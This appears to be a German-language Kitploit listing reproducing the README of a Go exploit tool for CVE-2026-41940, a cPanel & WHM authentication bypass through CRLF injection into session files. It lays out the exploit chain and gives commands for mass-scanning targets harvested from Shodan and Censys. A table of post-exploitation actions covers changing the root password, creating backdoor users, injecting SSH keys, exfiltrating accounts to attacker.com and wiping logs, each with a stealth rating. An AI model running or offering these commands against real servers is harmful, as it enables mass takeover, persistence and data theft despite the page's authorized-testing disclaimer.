Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-41940-Exploit-PoC — Exploit-PoC für CVE-2026-41940, eine Umgehung der Authentifizierung von cPanel & WHM über CRLF-Injection. Enthält Massen-Scanning, Post-Exploitation-Aktionen und eine interaktive Shell für autorisierte Tests. | Kitploit
Tools/GitHubGitHub/ishanoshada/cve-2026-41940-exploit-poc
Authentifizierung & AutorisierungSchwachstellenscannerExploitationWebanwendungs-ExploitationPost-ExploitationPenetrationstestsRed TeamingPayload-Entwicklung

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
GitHub
ishanoshada/cve-2026-41940-exploit-poc

CVE-2026-41940-Exploit-PoC

Exploit-PoC für CVE-2026-41940, eine Umgehung der Authentifizierung von cPanel & WHM über CRLF-Injection. Enthält Massen-Scanning, Post-Exploitation-Aktionen und eine interaktive Shell für autorisierte Tests.

Repository anzeigenWebseite
21vor 3 MonatenNoch nicht geprüft

CVE-2026-41940 Exploit PoC – cPanel & WHM Authentication Bypass

CVE-2026-41940 CVSS Go Version License

Tool von: Ishan Oshada | GitHub

⚠️ NUR FÜR AUTORISIERTE SICHERHEITSTESTS. Unautorisierte Nutzung ist illegal.

1


📋 Inhaltsverzeichnis

  • Übersicht der Schwachstelle
  • Exploit-Kette
  • Funktionen
  • Installation
  • Schnellstart
  • Anwendungsbeispiele
  • Post-Exploit-Aktionen
  • Interaktive Shell-Befehle
  • Massen-Scan mit urls.txt
  • Ausgabebeispiele
  • Optionen-Referenz
  • Betroffene Versionen
  • Build für alle Plattformen
  • FAQ & Fehlerbehebung
  • Haftungsausschluss
  • Autor

2

Übersicht der Schwachstelle

CVE-2026-41940 ist eine CRLF-Injection-Schwachstelle in cPanel & WHM (Versionen < 11.110.0.97, 11.118.0.63, 11.126.0.54, 11.132.0.29, 11.134.0.20, 11.136.0.5).

Die Funktion saveSession() schreibt Sitzungsdaten nach der Anwendung von filter_sessiondata(), aber der Filter wird zu spät angewendet. Durch das Injizieren von CRLF-Zeichen (\r\n) in den Authorization: Basic-Header kann ein Angreifer die Sitzungsdatei auf der Festplatte mit beliebigen Schlüssel-Wert-Paaren (z. B. hasroot=1, tfa_verified=1, user=root) vergiften.

Wenn die vergiftete Sitzung später geladen wird, gewährt cPanel/WHM vollen Root-Zugriff ohne Passwort.

CVSS-Score: 10.0 (KRITISCH)

  • Angriffsvektor: Netzwerk
  • Angriffskomplexität: Niedrig
  • Erforderliche Privilegien: Keine
  • Benutzerinteraktion: Keine
  • Vertraulichkeit: Hoch
  • Integrität: Hoch
  • Verfügbarkeit: Hoch

Exploit-Kette (4 Stufen)


Funktionen

  • ✅ Einzel- & Massen-Scan (Dateieingabe, stdin-Pipe)
  • ✅ Thread-Scan (Parallelität bis zu 100+ Threads steuerbar)
  • ✅ Verbose-Modus (--verbose) – zeigt vollständige HTTP-Anfragen/-Antworten
  • ✅ JSON-Ausgabe (automatisches Speichern bei gefundenem verwundbarem Ziel)
  • ✅ 10 Post-Exploit-Aktionen (siehe Tabelle unten)
  • ✅ Plattformübergreifend (Windows, Linux, macOS)
  • ✅ Keine externen Abhängigkeiten (nur Go-Standardbibliothek)
  • ✅ Farbige Terminalausgabe mit klar umrandeten Ergebnissen
  • ✅ Sitzungspersistenz – Keep-Alive-Mechanismus
  • ✅ Interaktive WHM-Shell mit Befehlsverlauf

Installation

Voraussetzungen

  • Go 1.20 oder höher (Download)

Repository klonen

root@kitploit:~
git clone https://github.com/ishanoshada/CVE-2026-41940-Exploit-PoC.git
cd CVE-2026-41940-Exploit-PoC

Ausführbare Datei erstellen

Windows

root@kitploit:~
go build -o cpanel_sniper.exe main.go

Linux / macOS

root@kitploit:~
go build -o cpanel_sniper main.go
chmod +x cpanel_sniper

Direkt ausführen (ohne Build)

root@kitploit:~
go run main.go -u https://target.com:2087

Vorgefertigte Binärdateien (schnellster Weg)

Statt aus dem Quellcode zu bauen, können Sie die neuesten stabilen ausführbaren Dateien direkt aus dem Repository herunterladen. Diese werden automatisch für jedes Update generiert:

Hinweis: Bei Linux oder macOS nach dem Download Ausführungsrechte vergeben:


Schnellstart

root@kitploit:~
# Grundlegender Scan
go run main.go -u https://target.com:2087

# Alle cPanel-Konten auflisten
go run main.go -u https://target.com:2087 -action list

# Interaktive WHM-Shell
go run main.go -u https://target.com:2087 -action shell

# Massen-Scan mit urls.txt
go run main.go -l urls.txt -t 20 -o results.json

Anwendungsbeispiele (Tabelle)


Post-Exploit-Aktionen


Interaktive Shell-Befehle

Innerhalb der Shell (-action shell) können diese Befehle verwendet werden:


Massen-Scan mit urls.txt

Das Repository enthält urls.txt mit 1000 Beispielzielen für den Massen-Scan.

urls.txt-Format

root@kitploit:~
https://192.168.1.1:2087
https://192.168.1.2:2087
https://example1.com:2087
https://example2.com:2087
...

Massen-Scan-Befehle

root@kitploit:~
# Grundlegender Massen-Scan (10 Threads)
go run main.go -l urls.txt

# Schneller Massen-Scan (50 Threads, Ergebnisse speichern)
go run main.go -l urls.txt -t 50 -o results.json

# Massen-Scan mit Post-Exploit-Aktion
go run main.go -l urls.txt -t 20 -action list -o hacked_servers.json

# Massen-Scan mit Verbose-Ausgabe
go run main.go -l urls.txt -t 10 --verbose

# Massen-Scan mit erhöhtem Timeout (langsame Netzwerke)
go run main.go -l urls.txt -t 30 -timeout 30

urls.txt selbst generieren

root@kitploit:~
# IP-Bereich generieren (Linux/macOS)
for i in {1..254}; do echo "https://192.168.1.$i:2087"; done > urls.txt

# IP-Bereich generieren (Windows PowerShell)
1..254 | ForEach-Object { "https://192.168.1.$($_):2087" } > urls.txt

# Von Shodan
shodan search --fields ip_str,port 'title:"WHM Login"' | awk '{print "https://"$1":"$2}' > urls.txt

# Von Censys
censys search 'services.port=2087' | awk '{print "https://"$1":2087"}' > urls.txt

Ausgabebeispiele

Verwundbares Ziel gefunden

root@kitploit:~
╔════════════════════════════════════════════════════════════════╗
║                    VERWUNDBARES ZIEL ERKANNT                   ║
╠════════════════════════════════════════════════════════════════╣
║ Ziel: https://target.example.com:2087                          ║
║ Token: /cpsess1234567890                                       ║
║ Version: 11.76.0.22                                            ║
║ Sitzung: :od2aMhg5zJeQunUy...                                  ║
║ API-URL: https://target.example.com:2087/cpsess1234567890/json-api/version ║
╚════════════════════════════════════════════════════════════════╝

[+] Aktion: LIST
    • Benutzer: admin | Domain: example.com
    • Benutzer: backup | Domain: backup.example.com
    • Benutzer: client1 | Domain: client1.com

Zusammenfassungsausgabe

root@kitploit:~
════════════════════════════════════════════════════════════════════
                    SCAN-ZUSAMMENFASSUNG
════════════════════════════════════════════════════════════════════
  Gescannte Ziele insgesamt: 1000
  Verwundbare Ziele: 47
  Verstrichene Zeit: 125.34 Sekunden

VERWUNDBARE ZIELE:
────────────────────────────────────────────────────────────────
  1. https://192.168.1.15:2087
      Token: /cpsess1111111111
      Version: 11.76.0.22
      Sitzung: :od2aMhg5zJeQunUy...
  2. https://192.168.1.42:2087
      Token: /cpsess2222222222
      Version: 11.86.0.15
      Sitzung: Km2psnYR9w3rRkLU...
  3. https://example.com:2087
      Token: /cpsess3333333333
      Version: 11.118.0.42
      Sitzung: Xk9mQrNtPw3sVbLm...

════════════════════════════════════════════════════════════════════

[✓] Ergebnisse gespeichert in: results.json

Optionen-Referenz


Betroffene Versionen


Build für alle Plattformen

Windows

root@kitploit:~
go build -o cpanel_sniper.exe main.go
cpanel_sniper.exe -u https://target.com:2087

Linux

root@kitploit:~
go build -o cpanel_sniper main.go
chmod +x cpanel_sniper
./cpanel_sniper -u https://target.com:2087

macOS (Intel)

root@kitploit:~
GOOS=darwin GOARCH=amd64 go build -o cpanel_sniper_mac_intel main.go

macOS (Apple Silicon M1/M2/M3)

root@kitploit:~
GOOS=darwin GOARCH=arm64 go build -o cpanel_sniper_mac_m1 main.go

Cross-Compile für alle Plattformen

root@kitploit:~
# Windows
GOOS=windows GOARCH=amd64 go build -o cpanel_sniper_windows.exe main.go

# Linux
GOOS=linux GOARCH=amd64 go build -o cpanel_sniper_linux main.go

# macOS Intel
GOOS=darwin GOARCH=amd64 go build -o cpanel_sniper_mac_intel main.go

# macOS M1/M2
GOOS=darwin GOARCH=arm64 go build -o cpanel_sniper_mac_m1 main.go

# Linux ARM (Raspberry Pi)
GOOS=linux GOARCH=arm64 go build -o cpanel_sniper_linux_arm64 main.go

Verzeichnisstruktur

root@kitploit:~
CVE-2026-41940-Exploit-PoC/
├── README.md           # Dokumentation
├── bin/                # Vorgefertigte Multi-Plattform-Executables 
│   ├── windows_x64/
│   ├── linux_x64/
│   └── ...
├── main.go             # Hauptquellcode
├── urls.txt            # 1000 Beispielziele
├── go.mod              # Go-Moduldatei
├── .gitignore          # Git-Ignore-Datei
└── results.json        # Ausgabedatei (generiert)

Haftungsausschluss

Dieses Tool dient nur Bildungszwecken und autorisierten Penetrationstests.

Unautorisierter Zugriff auf Computersysteme ist illegal gemäß:

  • Computer Fraud and Abuse Act (CFAA) – USA
  • Computer Misuse Act – Großbritannien
  • Information Technology Act – Indien
  • Ähnlichen Gesetzen weltweit

Der Autor übernimmt keine Haftung für Missbrauch. Nutzung auf eigene Gefahr.

Durch die Nutzung dieses Tools stimmen Sie zu, dass Sie die ordnungsgemäße Autorisierung zum Testen der Zielsysteme besitzen.


Autor

Ishan Oshada

  • 🔗 Website: ishanoshada.com
  • 🐙 GitHub: github.com/ishanoshada
  • 📧 E-Mail: [email protected]

Views

Unterstützung

Wenn Sie dieses Tool nützlich finden:

  • ⭐ Das Repository auf GitHub mit einem Stern markieren
  • 🔄 Mit der Sicherheits-Community teilen
  • 📝 Probleme über GitHub Issues melden

Viel Spaß beim Hacken! 🚀

Denken Sie daran: Mit großer Macht kommt große Verantwortung. Nutzen Sie es ethisch.

Tool herunterladen
StufeAktionBeschreibung
1POST /login/?login_only=1Pre-Auth-Sitzungscookie mit falschen Anmeldedaten anfordern
2GET / + CRLF Authorization-HeaderSitzungsdatei mit hasroot=1, user=root usw. vergiften
3GET /scripts2/listacctsSitzungscache zwingen, die vergiftete Datei neu zu laden (Propagation)
4GET /cpsess<TOKEN>/json-api/versionRoot-Zugriff verifizieren – Erfolg = 200 + Versionsdaten
PlattformSpeicherort
Windows (x64)/bin/windows_x64/cpanel_sniper.exe
Linux (x64)/bin/linux_x64/cpanel_sniper
Linux (ARM64)/bin/linux_arm64/cpanel_sniper
macOS (Intel)/bin/mac_intel/cpanel_sniper
macOS (M1/M2/M3)/bin/mac_m1_m2/cpanel_sniper
#ZweckBefehl
1Grundlegender Einzelziel-Scango run main.go -u https://target.com:2087
2Alle cPanel-Konten auflistengo run main.go -u https://target.com:2087 -action list
3Root-Passwort änderngo run main.go -u https://target.com:2087 -action passwd -passwd "NewP@ssw0rd!2006"
4Systembefehl ausführengo run main.go -u https://target.com:2087 -action cmd -cmd "id && whoami"
5Serverinformationen abrufengo run main.go -u https://target.com:2087 -action info
6Backdoor-Benutzer erstellengo run main.go -u https://target.com:2087 -action adduser -new-user backdoor -new-domain backdoor.com -passwd "Pass123!2006"
7API-Token erstellen (heimlich)go run main.go -u https://target.com:2087 -action apitoken -tokenname mytoken
8SSH-Schlüssel injizierengo run main.go -u https://target.com:2087 -action sshkey -sshkey "ssh-rsa AAAAB3NzaC1yc2E..."
9Konto sichern & exfiltrierengo run main.go -u https://target.com:2087 -action dumpacct -dumpuser victim -exfil https://attacker.com/upload
10Logs löschen & Spuren verwischengo run main.go -u https://target.com:2087 -action wipe
11Interaktive WHM-Shellgo run main.go -u https://target.com:2087 -action shell
12Massen-Scan aus Dateigo run main.go -l urls.txt -t 20 -o results.json
13Ergebnisse als JSON speicherngo run main.go -u https://target.com:2087 -o scan_results.json
14Verbose-Debugging aktivierengo run main.go -u https://target.com:2087 --verbose
15Pipe von anderen Toolscat urls.txt | go run main.go -t 20
16Timeout erhöhengo run main.go -u https://target.com:2087 -timeout 30
AktionFlagBeschreibungTarnungsstufe
list-action listAlle cPanel-Konten auflistenNiedrig
passwd-action passwd -passwd NEUESPASSWORTRoot-Passwort ändern (laut)Hoch (erkennbar)
cmd-action cmd -cmd "id"OS-Befehle ausführenMittel
info-action infoHostname, Last, Version anzeigenNiedrig
adduser-action adduser -new-user U -new-domain DBackdoor-cPanel-Benutzer erstellenMittel
apitoken-action apitoken [-tokenname NAME]Dauerhaftes API-Token generierenSehr niedrig
sshkey-action sshkey -sshkey "ssh-rsa..."SSH-Public-Key in Root injizierenSehr niedrig
dumpacct-action dumpacct -dumpuser BENUTZER -exfil URLKonto sichern & exfiltrierenMittel
wipe-action wipeWAF deaktivieren, Logs löschen, Verlauf löschenSpuren verwischen
shell-action shellInteraktive WHM-ShellNiedrig
BefehlBeschreibungBeispiel
accountsAlle cPanel-Konten auflistenaccounts
passwd <pass>Root-Passwort ändernpasswd MyNewPass123!2006
exec <command>Systembefehl ausführenexec "cat /etc/passwd"
infoServerinformationen anzeigeninfo
versioncPanel-Version anzeigenversion
helpVerfügbare Befehle anzeigenhelp
exitShell beendenexit
OptionTypStandardBeschreibung
-ustring-Ziel-URL (z. B. https://example.com:2087)
-lstring-Datei mit Zielen (eine pro Zeile)
-tint10Anzahl der gleichzeitigen Threads
-actionstring-Post-Exploit-Aktion
-passwdstring-Neues Passwort (für passwd/adduser)
-cmdstring-Auszuführender Befehl (für cmd-Aktion)
-new-userstring-Benutzername für adduser-Aktion
-new-domainstring-Domain für adduser-Aktion
-tokennamestring-Name für API-Token (apitoken-Aktion)
-sshkeystring-Öffentlicher SSH-Schlüssel zum Injizieren (sshkey-Aktion)
-dumpuserstring-Benutzername zum Sichern (dumpacct-Aktion)
-exfilstring-Remote-URL für Exfiltration (dumpacct-Aktion)
-ostring-Ausgabe-JSON-Datei (automatisches Speichern bei Fund)
--verboseboolfalseHTTP-Anfragen/-Antworten anzeigen
-hboolfalseHilfemenü anzeigen
BranchGepatchte VersionVerwundbar <
11.11011.110.0.9711.110.0.96
11.11811.118.0.6311.118.0.62
11.12611.126.0.5411.126.0.53
11.13211.132.0.2911.132.0.28
11.13411.134.0.2011.134.0.19
11.13611.136.0.511.136.0.4